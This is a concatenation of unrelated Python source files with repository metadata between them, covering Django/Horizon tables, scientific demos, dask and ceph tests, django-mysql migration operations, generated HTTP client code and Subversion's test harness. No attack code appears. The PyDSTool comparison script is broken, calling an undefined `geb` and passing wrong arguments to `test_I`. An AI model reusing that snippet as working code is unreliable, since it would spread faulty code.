def comp(group):
if q in group.name.lower():
return True
return False
return filter(comp, groups)
class GroupsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'))
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'))
id = tables.Column('id', verbose_name=_('Group ID'))
class Meta:
name = "groups"
|
verbose_name = _("Groups")
row_acti
|
ons = (ManageUsersLink, EditGroupLink, DeleteGroupsAction)
table_actions = (GroupFilterAction, CreateGroupLink,
DeleteGroupsAction)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()
or q in getattr(user, 'email', '').lower()]
class RemoveMembers(tables.DeleteAction):
name = "removeGroupMember"
action_present = _("Remove")
action_past = _("Removed")
data_type_singular = _("User")
data_type_plural = _("Users")
policy_rules = (("identity", "identity:remove_user_from_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Removing user %s from group %s.' % (user_obj.id,
group_id))
api.keystone.remove_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when removing current user
# Keystone revokes the token of the user removed from the group.
# If the logon user was removed, redirect the user to logout.
class AddMembersLink(tables.LinkAction):
name = "add_user_link"
verbose_name = _("Add...")
classes = ("ajax-modal",)
icon = "plus"
url = constants.GROUPS_ADD_MEMBER_URL
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def get_link_url(self, datum=None):
return reverse(self.url, kwargs=self.table.kwargs)
class UsersTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=[defaultfilters.escape,
defaultfilters.urlize])
id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
empty_value="False")
class GroupMembersTable(UsersTable):
class Meta:
name = "group_members"
verbose_name = _("Group Members")
table_actions = (UserFilterAction, AddMembersLink, RemoveMembers)
class AddMembers(tables.BatchAction):
name = "addMember"
action_present = _("Add")
action_past = _("Added")
data_type_singular = _("User")
data_type_plural = _("Users")
icon = "plus"
requires_input = True
success_url = constants.GROUPS_MANAGE_URL
policy_rules = (("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Adding user %s to group %s.' % (user_obj.id,
group_id))
api.keystone.add_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when adding current user
# Keystone revokes the token of the user added to the group.
# If the logon user was added, redirect the user to logout.
def get_success_url(self, request=None):
group_id = self.table.kwargs.get('group_id', None)
return reverse(self.success_url, args=[group_id])
class GroupNonMembersTable(UsersTable):
class Meta:
name = "group_non_members"
verbose_name = _("Non-Members")
table_actions = (UserFilterAction, AddMembers)
|
schilli/MOPS
|
MOPS/demo/demo_mean.py
|
Python
|
gpl-3.0
| 1,694 | 0.013577 |
#!/usr/bin/env python
# This is a demonstration of how to compute S2 order parameters from bond vector correlation functions.
# The S2 estimation is done with the method described in:
# Trbovic et al. Proteins (2008). doi:10.1002/prot.21750
from __future__ import print_function, division
import sys, os, glob
import MOPS as mops
import matplotlib.pyplot as plt
# the correlation functions are stored in a subfolder of the current working directory
# a
|
fter running test_corr.py
corrpath = "./MOPS_test_corr_fit"
if not os.path.isdir(corrpath):
print("No correlation functions found.")
print("Please run test_corr_fit.py first.")
sys.exit(1)
# load correlation functions
corrFilenames = glob.glob(corrpath + '/*.zip')
op = mops.OrderParameter(corrfilenames=corrFilenames)
# predict order parameters, take only converged correlation functions into account
op.estimate("mean", converged=True)
# extract informa
|
tion
S2 = op.S2mean
S2_std = op.S2std
S2_err = op.S2error # = S2.std / <number subtrajectories>
avgcorr = op.avgcorr # correlation function object with averaged correlation functions over all subtrajectories
corr = avgcorr.corr # numerical correlation functions, array of shape = (nresidues, timeframes)
corrlist = op.corrlist # list of correlation functions per subtrajectory
resids = op.avgcorr.resid[0] # residue ID of the first residue of the bond vector
residx = op.avgcorr.resid[0] # residue index (0-based)
resnames = op.avgcorr.resname[0] # residue name
atomnames = op.avgcorr.atomname[0] # atom name
plt.bar(resids, S2, yerr=S2_std)
plt.ylim(0,1)
plt.xlabel('Reisdue Number')
plt.ylabel(r'S$^2$')
plt.show()
|
srcc-msu/job_statistics
|
tagit.py
|
Python
|
mit
| 1,689 | 0.03138 |
from optparse import OptionParser
from application.database import global_db
from application.setup import create_app, setup_database, register_blueprints, load_cluster_config
from core.job.models import Job
from core.monitoring.models import JobPerformance
from core.tag.models import JobTag, Tag
from modules.autotag.models import AutoTag
def run(config: str):
app = create_app(config)
load_cluster_config("cluster_config/", app)
app.logger.info("loading db")
setup_database(app, False)
app.logger.info("loading blueprints")
register_blueprints(app)
return app
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--config", dest="config", default="dev", help="[dev]elopment or [prod]uction configuration")
parser.add_option("-t", "--t_end", dest="t_end", default=1483025545, help="include tasks completed after [t_end] timestamp")
(options, args) = parser.parse_args()
app = run(options.config)
@app
|
.before_first_request
def tagit():
print("starting tagging")
conditions = []
for autotag in AutoTag.query.all():
conditions.append((autotag.compile_condition(), Tag.query.get(autotag.fk_tag_id).label))
query = global_db.session \
.query(Job, JobPerformance, JobTag) \
.filter(Job.t_end >
|
options.t_end) \
.join(JobPerformance)\
.join(JobTag)
for job,perf,job_tag in query.all():
tags = ""
for condition, label in conditions:
try:
if condition(job, perf):
tags += ";{0}".format(label)
except:
pass
print("{0},{1}".format(job.id, tags))
app.run(host=app.config.get("HOST", "localhost"), port=app.config.get("PORT", 5000) + 10, use_reloader=False)
|
stczhc/neupy
|
examples/gd/mnist_cnn.py
|
Python
|
mit
| 1,657 | 0 |
import theano
import numpy as np
from sklearn.preprocessing import OneHotEncoder
from sklearn import cross_validation, metrics, datasets
from neupy import algorithms, layers, environment
environment.reproducible()
theano.config.floatX = 'float32'
mnist = datasets.fetch_mldata('MNIST original')
target_scaler = OneHotEncoder()
target = mnist.target.reshape((-1, 1))
target = target_scaler.fit_transform(target).todense()
data = mnist.data / 255.
data = data - data.mean(axi
|
s=0)
n_samples = data.shape[0]
data = data.reshape((n_samples, 1, 28, 28))
x_train, x_test, y_train, y_test = cross_validation.train_test_split(
data.astype(np.float32),
target.astype(np.float32),
train_size=(6 / 7.)
)
network = algorithms.Adadelta(
[
layers.Convolution((32, 1, 3, 3)),
layers.Relu(),
layers.Convolution((48, 32, 3, 3)),
layers.Relu(
|
),
layers.MaxPooling((2, 2)),
layers.Dropout(0.2),
layers.Reshape(),
layers.Relu(48 * 12 * 12),
layers.Dropout(0.3),
layers.Softmax(200),
layers.ArgmaxOutput(10),
],
error='categorical_crossentropy',
step=1.0,
verbose=True,
shuffle_data=True,
epochs_step_minimizator=8,
addons=[algorithms.SimpleStepMinimization],
)
network.architecture()
network.train(x_train, y_train, x_test, y_test, epochs=6)
y_predicted = network.predict(x_test)
y_test_labels = np.asarray(y_test.argmax(axis=1)).reshape(len(y_test))
print(metrics.classification_report(y_test_labels, y_predicted))
score = metrics.accuracy_score(y_test_labels, y_predicted)
print("Validation accuracy: {:.2f}%".format(100 * score))
|
ceph/ceph-deploy
|
ceph_deploy/tests/unit/hosts/test_altlinux.py
|
Python
|
mit
| 379 | 0.002639 |
from ceph_deploy.hosts.alt.install import map_components, NON_SPLIT_PACKAGES
class TestALTMapComponents
|
(object):
def test_valid(self):
pkgs = map_components(NON_SPLIT_PACKAGES, ['ceph-osd', 'ceph-common', 'ceph-ra
|
dosgw'])
assert 'ceph' in pkgs
assert 'ceph-common' in pkgs
assert 'ceph-radosgw' in pkgs
assert 'ceph-osd' not in pkgs
|
blaze/distributed
|
distributed/deploy/tests/test_local.py
|
Python
|
bsd-3-clause
| 29,495 | 0.000712 |
import asyncio
from functools import partial
import gc
import subprocess
import sys
from time import sleep
from threading import Lock
import unittest
import weakref
from distutils.version import LooseVersion
from tornado.ioloop import IOLoop
import tornado
from tornado.httpclient import AsyncHTTPClient
import pytest
from dask.system import CPU_COUNT
from distributed import Client, Worker, Nanny, get_client
from distributed.deploy.local import LocalCluster, nprocesses_nthreads
from distributed.metrics import time
from distributed.system import MEMORY_LIMIT
from distributed.utils_test import ( # noqa: F401
clean,
cleanup,
inc,
gen_test,
slowinc,
assert_cannot_connect,
assert_can_connect_locally_4,
assert_can_connect_from_everywhere_4,
assert_can_connect_from_everywhere_4_6,
captured_logger,
tls_only_security,
)
from distributed.utils_test import loop # noqa: F401
from distributed.utils import sync, TimeoutError
from distributed.deploy.utils_test import ClusterTest
def test_simple(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as c:
with Client(c) as e:
x = e.submit(inc, 1)
x.result()
assert x.key in c.scheduler.tasks
assert any(w.data == {x.key: 2} for w in c.workers.values())
assert e.loop is c.loop
def test_local_cluster_supports_blocked_handlers(loop):
with LocalCluster(blocked_handlers=["run_function"], n_workers=0, loop=loop) as c:
with Client(c) as client:
with pytest.raises(ValueError) as exc:
client.run_on_scheduler(lambda x: x, 42)
assert "'run_function' handler has been explicitly disallowed in Scheduler" in str(
exc.value
)
def test_close_twice():
with LocalCluster() as cluster:
with Client(cluster.scheduler_address) as client:
f = client.map(inc, range(100))
client.gather(f)
with captured_logger("tornado.application") as log:
cluster.close()
cluster.close()
sleep(0.5)
log = log.getvalue()
assert not log
def test_procs():
with LocalCluster(
2,
scheduler_port=0,
processes=False,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Worker) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(w.nthreads == 3 for w in c.workers.values())
assert all(isinstance(w, Worker) for w in c.workers.values())
repr(c)
with LocalCluster(
2,
scheduler_port=0,
processes=True,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Nanny) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(v == 3 for v in e.nthreads().values())
c.scale(3)
assert all(isinstance(w, Nanny) for w in c.workers.values())
repr(c)
def test_move_unserializable_data():
"""
Test that unserializable data is still fine to transfer over inproc
transports.
"""
with LocalCluster(
processes=False, silence_logs=False, dashboard_address=None
) as cluster:
assert cluster.scheduler_address.startswith("inproc://")
assert cluster.workers[0].address.startswith("inproc://")
with Client(cluster) as client:
lock = Lock()
x = client.scatter(lock)
y = client.submit(lambda x: x, x)
assert y.result() is lock
def test_transports_inproc():
"""
Test the transport chosen by LocalCluster depending on arguments.
"""
with LocalCluster(
1, processes=False, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("inproc://")
assert c.workers[0].address.startswith("inproc://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp():
# Have nannies => need TCP
with LocalCluster(
1, processes=True, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("tcp://")
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp_port():
# Scheduler port specified => need TCP
with LocalCluster(
1,
processes=False,
scheduler_port=8786,
silence_logs=False,
dashboard_address=None,
) as c:
assert c.scheduler_address == "tcp://127.0.0.1:8786"
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
class LocalTest(ClusterTest, unittest.TestCase):
Cluster = partial(LocalCluster, silence_logs=False, dashboard_address=None)
kwargs = {"dashboard_address": None, "processes": False}
def test_Client_with_local(loop):
with LocalCluster(
1, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
with Client(c) as e:
assert len(e.nthreads()) == len(c.workers)
assert c.scheduler_address in repr(c)
def test_Client_solo(loop):
with Client(loop=loop, silence_logs=False) as c:
pass
assert c.cluster.status == "closed"
@gen_test()
async def test_duplicate_clients():
pytest.importorskip("bokeh")
c1 = await Client(
processes=False, silence_logs=False, dashboard_address=9876, asynchronous=True
)
with pytest.warns(Warning) as info:
c2 = await Client(
processes=False,
silence_logs=False,
dashboard_address=9876,
asynchronous=True,
)
assert "dashboard" in c1.cluster.scheduler.services
assert "dashboard" in c2.cluster.scheduler.s
|
ervices
assert any(
all(
word in str(msg.message).lower()
for word in ["9876", "running", "already in use"]
)
for msg in info.list
)
await c1.close()
|
await c2.close()
def test_Client_kwargs(loop):
with Client(loop=loop, processes=False, n_workers=2, silence_logs=False) as c:
assert len(c.cluster.workers) == 2
assert all(isinstance(w, Worker) for w in c.cluster.workers.values())
assert c.cluster.status == "closed"
def test_Client_unused_kwargs_with_cluster(loop):
with LocalCluster() as cluster:
with pytest.raises(Exception) as argexcept:
c = Client(cluster, n_workers=2, dashboard_port=8000, silence_logs=None)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_unused_kwargs_with_address(loop):
with pytest.raises(Exception) as argexcept:
c = Client(
"127.0.0.1:8786", n_workers=2, dashboard_port=8000, silence_logs=None
)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_twice(loop):
with Client(loop=loop, silence_logs=False, dashboard_address=None) as c:
with Client(loop=loop, silence_logs=False, dashboard_address=None) as f:
assert c.cluster.scheduler.port != f.cluster.scheduler.port
@pytest.mark.asyncio
async def test_client_constructor_with_temporary_security(cleanup):
pytest.importorskip("cryptography")
async with Client(
security=True, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert c.cluster.scheduler_address.startswith("tls")
assert c.security == c.cluster.security
@pytest.mark.asyncio
async def test_defaults(cleanup):
async with Loc
|
robclewley/compneuro
|
Ch9_HH_compare.py
|
Python
|
bsd-3-clause
| 1,267 | 0.007893 |
"""
Human cortical neuron using A-current model in reduced, 2D version of Hodgkin-Huxley model
Section 9.5
"""
from __future__ import division
from PyDSTool import *
from PyDSTool.Toolbox.phaseplane import *
from common_lib import *
import Ch9_HH_red
import Ch9_HH
gentype='vode' # dopri, euler, etc.
# Parameter An = noise amplitude
#
|
As = sine wave amplitude
# f = frequency, should be >= 50 Hz
par_args = {'tau_v': 1, 'tau_r': 5.6,
'As': 0, 'f': 700, 'An': 0., 'Iapp': 0.8}
ic_args = {'v':-0.8, 'r': 0.25}
def test_I(gen, Iapp, tmax=300, silent=False):
geb.set(pars={'Iapp': Iapp},
tdata=[0,tmax])
traj = gen.compute('test')
pts = traj.sample()
f = freq(tr
|
aj)
if not silent:
plt.clf()
plt.plot(pts['t'], pts['v'], 'b')
plt.ylim([-0.85, 0.4])
print "Frequency response was:", f
return f
# original version
HH = Ch9_HH.makeHHneuron('HH', par_args, ic_args, const_I=True,
gentype=gentype)
# 2D reduced version
HHred = Ch9_HH_red.makeHHneuron('HHred', par_args, ic_args, const_I=True,
gentype=gentype)
# vary Iapp up to 2
# 0.791 is the closest to the saddle-node bif point to 3 decimal places
test_I(0.791, 500)
plt.show()
|
Rhombik/rhombik-object-repository
|
searchsettings/templatetags/addSearchContext.py
|
Python
|
agpl-3.0
| 669 | 0.014948 |
from django import template
from filemanager.models import fileobject
from django.shortcuts import get_object_or_404, render_to_response
from django.template.loader import render_to_string
from django.contrib.contenttypes.models import ContentTyp
|
e
register = template.Library()
def raw_text(context):
project=context['object']
object_type = ContentType.objects.get_for_model(project)
projectfiles = fileobject.objects.filter(content_type=object_type,object_id=project.id, filetype="text")
textlist = ""
|
for i in projectfiles:
textlist = textlist+i.filename.read()
return textlist
register.simple_tag(takes_context=True)(raw_text)
|
adamchainz/django-mysql
|
src/django_mysql/operations.py
|
Python
|
mit
| 5,386 | 0.000928 |
from __future__ import annotations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.utils.functional import cached_property
class InstallPlugin(Operation):
reduces_to_sql = False
reversible = True
def __init__(self, name: str, soname: str) -> None:
self.name = name
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if not self.plugin_installed(schema_editor):
schema_editor.execute(
f"INSTALL PLUGIN {self.name} SONAME %s", (self.soname,)
)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if self.plugin_installed(schema_editor):
schema_editor.execute("UNINSTALL PLUGIN %s" % self.name)
def plugin_installed(self, schema_editor: BaseDatabaseSchemaEditor) -> bool:
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*)
FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME LIKE %s""",
(self.name,),
)
count = cursor.fetchone()[0]
return count > 0
def describe(self) -> str:
return f"Installs plugin {self.name} from {self.soname}"
class InstallSOName(Operation):
reduces_to_sql = True
reversible = True
def __init__(self, soname: str) -> None:
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("INSTALL SONAME %s", (self.soname,))
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("UNINSTALL SONAME %s", (self.soname,))
def describe(self) -> str:
return "Installs library %s" % (self.soname)
class AlterStorageEngine(Operation):
def __init__(
self, name: str, to_engine: str, from_engine: str | None = None
) -> None:
self.name = name
self.engine = to_engine
self.from_engine = from_engine
@property
def reversible(self) -> bool:
return self.from_engine is not None
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
self._change_engine(app_label, schema_editor, to_state, engine=self.engine)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
if self.from_engine is None:
raise NotImplementedError("You cannot reverse this operation")
self._change_engine(app_label, schema_editor, to_state, engine=self.from_engine)
def _change_engine(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
to_state: ModelState,
engine: str,
) -> None:
new_model = to_state.apps.get_model(app_label, self.name)
qn = schema_editor.connection.ops.quote_name
if self.allow_migrate_model( # pragma: no branch
schema_editor.connection.alias, new_model
):
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME = %s AND
ENGINE = %s""",
(new_model._meta.db_table, engine),
)
uses_engine_already = cursor.fetchone()[0] > 0
if uses_engine_already:
return
schema_editor.execute(
"ALTER TABLE {table} ENGINE={engine}".format(
table=qn(new_model._meta.db_table),
engine=engine,
)
)
@cached_property
def name_lower(self) -> str:
return self.name.lower()
|
def references_model(self, name: str, app_label: str | None = None) -> bool:
return name.lower() == self.name_lower
def describe(self) -> str:
if self.from_engine:
from_clause = f" from {self.from_engine}"
else:
from_clause = ""
return "Alter storage engine for {model}{from_clause} to {engine}".format(
model
|
=self.name, from_clause=from_clause, engine=self.engine
)
|
hanya/BookmarksMenu
|
pythonpath/bookmarks/env/mate.py
|
Python
|
apache-2.0
| 42 | 0 |
OP
|
EN = "mate-open"
FILE_MANAGER = "caj
|
a"
|
qrsforever/workspace
|
python/learn/base/module/l1/pack/__init__.py
|
Python
|
mit
| 78 | 0.012821 |
#!/usr/bin/python2
|
.7
print
|
"__init__"
# __all__ = ['p2']
from big import *
|
shaggytwodope/progeny
|
validators.py
|
Python
|
gpl-3.0
| 3,149 | 0 |
PROJECT_DEFAULTS = 'Project Defaults'
PATHS = 'Paths'
_from_config = {
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprints': None
}
_from_args = {
'name': None,
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprint': None
}
def load_args(args):
from_args = _from_args.copy()
keys = _from_args.keys()
for key in keys:
if args.__contains__(key):
from_args[key] = args.__getattribute__(key)
return from_args
def load_config(config):
from_config = _from_config.copy()
keys = _from_config.keys()
if config:
if config.has_section(PROJECT_DEFAULTS):
for key in keys:
if config.has_option(PROJECT_DEFAULTS, key):
from_config[key] = config.get(PROJECT_DEFAULTS, key)
if config.has_section(PATHS):
for key in keys:
if config.has_option(PATHS, key):
from_config[key] = config.get(PATHS, key)
return from_config
def merge_configged_argged(configged, argged):
merged = configged.copy()
for key in argged.keys():
if True in [key == k for k in configged.keys()]:
# We only care about a None val if the key exists in configged
# this will overwrite the config so that args take percedence
if argged[key] is not None:
merged[key] = argged[key]
else:
# If the key is not already here, then it must be 'footprint', in
# which case we definitely want to include it since that is our
# highest priority and requires less args to generate a project
merged[key] = argged[key]
return merged
def footprint_requires(merged):
required = ['name', 'parent']
passed = 0
pass_requires = len(required)
for r in required:
if r in merged.keys():
if merged[r] is not None:
passed += 1
return passed == pass_requires
|
def solo_args_requires(args):
required = ['name', 'parent', 'language', 'type']
passed = 0
pass_requires = len(required)
for r in required:
if r in args.keys():
if args[r] is not None:
passed += 1
return passed == pass_requires
def validate_ar
|
gs(args, config):
if config is not None:
configged = load_config(config)
argged = load_args(args)
merged = merge_configged_argged(configged, argged)
# If footprint is provided, we only need name and parent
if merged['footprint'] is not None:
return footprint_requires(merged), merged
# If no footprint, we need name, parent, language, and type to perform
# footprint lookups
if None not in [merged['name'], merged['parent'], merged['language'],
merged['type']]:
return True, merged
return False, merged
argged = load_args(args)
return solo_args_requires(argged), argged
|
sharadagarwal/autorest
|
AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Http/autoresthttpinfrastructuretestservice/operations/http_retry.py
|
Python
|
mit
| 13,601 | 0.000588 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class HttpRetry(object):
"""HttpRetry operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def head408(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 408 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/408'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.head(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def put500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get502(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 502 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/502'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
ur
|
l = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_
|
headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_con
|
centic9/subversion-ppa
|
subversion/tests/cmdline/svntest/main.py
|
Python
|
apache-2.0
| 78,919 | 0.01219 |
#
# main.py: a shared, automated test suite for Subversion
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import sys
import os
import shutil
import re
import stat
import subprocess
import time
import threading
import optparse
import xml
import urllib
import logging
import hashlib
from urlparse import urlparse
try:
# Python >=3.0
import queue
from urllib.parse import quote as urllib_parse_quote
from urllib.parse import unquote as urllib_parse_unquote
except ImportError:
# Python <3.0
import Queue as queue
from urllib import quote as urllib_parse_quote
from urllib import unquote as urllib_parse_unquote
import svntest
from svntest import Failure
from svntest import Skip
SVN_VER_MINOR = 8
######################################################################
#
# HOW TO USE THIS MODULE:
#
# Write a new python script that
#
# 1) imports this 'svntest' package
#
# 2) contains a number of related 'test' routines. (Each test
# routine should take no arguments, and return None on success
# or throw a Failure exception on failure. Each test should
# also contain a short docstring.)
#
# 3) places all the tests into a list that begins with None.
#
# 4) calls svntest.main.client_test() on the list.
#
# Also, your tests will probably want to use some of the common
# routines in the 'Utilities' section below.
#
#####################################################################
# Global stuff
default_num_threads = 5
# Don't try to use this before calling execute_tests()
logger = None
class SVNProcessTerminatedBySignal(Failure):
"Exception raised if a spawned process segfaulted, aborted, etc."
pass
class SVNLineUnequal(Failure):
"Exception raised if two lines are unequal"
pass
class SVNUnmatchedError(Failure):
"Exception raised if an expected error is not found"
pass
class SVNCommitFailure(Failure):
"Exception raised if a commit failed"
pass
class SVNRepositoryCopyFailure(Failure):
"Exception raised if unable to copy a repository"
pass
class SVNRepositoryCreateFailure(Failure):
"Exception raised if unable to create a repository"
pass
# Windows specifics
if sys.platform == 'win32':
windows = True
file_scheme_prefix = 'file:'
_exe = '.exe'
_bat = '.bat'
